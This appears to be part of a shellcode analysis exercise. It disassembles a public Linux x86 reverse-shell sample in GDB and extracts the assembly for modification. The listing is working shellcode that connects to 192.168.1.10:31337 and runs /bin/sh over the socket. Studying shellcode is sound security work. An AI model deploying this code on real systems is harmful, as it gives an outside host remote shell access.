1. Reverse TCP bind shell
Using the original hex encoded shellcode, we attempt to reconstruct the original file and make some modifications and optimizations of our own.
First, let’s copy to a file to make some modifications.
Compiling original file:
$ ../compile_c.sh c_linx86_revtcp_bind_shellstorm_sample1_original
[+] Compiling ...
[+] Done!Debuggging GDB:
$ gdb -q ./c_linx86_revtcp_bind_shellstorm_sample1_originalSetting breakpoint at code function:
gdb-peda$ b *&code
Breakpoint 1 at 0x804a040Printing out code part and to file:
We copy until the last int 0x80, because the last line isn’t required for functionality.
gdb-peda$ x/45i &code
=> 0x804a040 <code>: xor eax,eax
0x804a042 <code+2>: xor ebx,ebx
0x804a044 <code+4>: xor ecx,ecx
0x804a046 <code+6>: xor edx,edx
0x804a048 <code+8>: mov al,0x66
0x804a04a <code+10>: mov bl,0x1
0x804a04c <code+12>: push ecx
0x804a04d <code+13>: push 0x6
0x804a04f <code+15>: push 0x1
0x804a051 <code+17>: push 0x2
0x804a053 <code+19>: mov ecx,esp
0x804a055 <code+21>: int 0x80
0x804a057 <code+23>: mov esi,eax
0x804a059 <code+25>: mov al,0x66
0x804a05b <code+27>: xor ebx,ebx
0x804a05d <code+29>: mov bl,0x2
0x804a05f <code+31>: push 0xa01a8c0
0x804a064 <code+36>: pushw 0x697a
0x804a068 <code+40>: push bx
0x804a06a <code+42>: inc bl
0x804a06c <code+44>: mov ecx,esp
0x804a06e <code+46>: push 0x10
0x804a070 <code+48>: push ecx
0x804a071 <code+49>: push esi
0x804a072 <code+50>: mov ecx,esp
0x804a074 <code+52>: int 0x80
0x804a076 <code+54>: xor ecx,ecx
0x804a078 <code+56>: mov cl,0x3
0x804a07a <code+58>: dec cl
0x804a07c <code+60>: mov al,0x3f
0x804a07e <code+62>: int 0x80
0x804a080 <code+64>: jne 0x804a07a <code+58>
0x804a082 <code+66>: xor eax,eax
0x804a084 <code+68>: push edx
0x804a085 <code+69>: push 0x68732f6e
0x804a08a <code+74>: push 0x69622f2f
0x804a08f <code+79>: mov ebx,esp
0x804a091 <code+81>: push edx
0x804a092 <code+82>: push ebx
0x804a093 <code+83>: mov ecx,esp
0x804a095 <code+85>: push edx
0x804a096 <code+86>: mov edx,esp
0x804a098 <code+88>: mov al,0xb
0x804a09a <code+90>: int 0x80
0x804a09c <code+92>: add BYTE PTR [eax],al
Using GDB for logging to file
gdb-peda$ set logging file gdb_linx86_revtcp_bind_shellstorm_sample1.txt
gdb-peda$ set logging on
Redirecting output to gdb_linx86_revtcp_bind_shellstorm_sample1.txt.
gdb-peda$ x/44i &code
gdb-peda$ set logging off
Done logging to gdb_linx86_revtcp_bind_shellstorm_sample1.txt.AWK’ing created file
Using some AWK and SED Fu, we copy the output to a file for manual ASM analysis.
$ awk '{print substr($0, index($0, $3))}' gdb_linx86_revtcp_bind_shellstorm_sample1.txt | sed -e 's/<code>:\t//' | sed -e 's/<code+58>//'
xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
mov al,0x66
mov bl,0x1
push ecx
push 0x6
push 0x1
push 0x2
mov ecx,esp
int 0x80
mov esi,eax
mov al,0x66
xor ebx,ebx
mov bl,0x2
push 0xa01a8c0
pushw 0x697a
push bx
inc bl
mov ecx,esp
push 0x10
push ecx
push esi
mov ecx,esp
int 0x80
xor ecx,ecx
mov cl,0x3
dec cl
mov al,0x3f
int 0x80
jne 0x804a07a
xor eax,eax
push edx
push 0x68732f6e
push 0x69622f2f
mov ebx,esp
push edx
push ebx
mov ecx,esp
push edx
mov edx,esp
mov al,0xb
int 0x80
$ awk '{print substr($0, index($0, $3))}' gdb_linx86_revtcp_bind_shellstorm_sample1.txt | sed -e 's/<code>:\t//' | sed -e 's/<code+58>//' > asm_linx86_revtcp_bind_shellstorm_sample1.asm
Copy for own modifications
$ cp asm_linx86_revtcp_bind_shellstorm_sample1.asm asm_linx86_revtcp_bind_shellstorm_sample1-alt.asm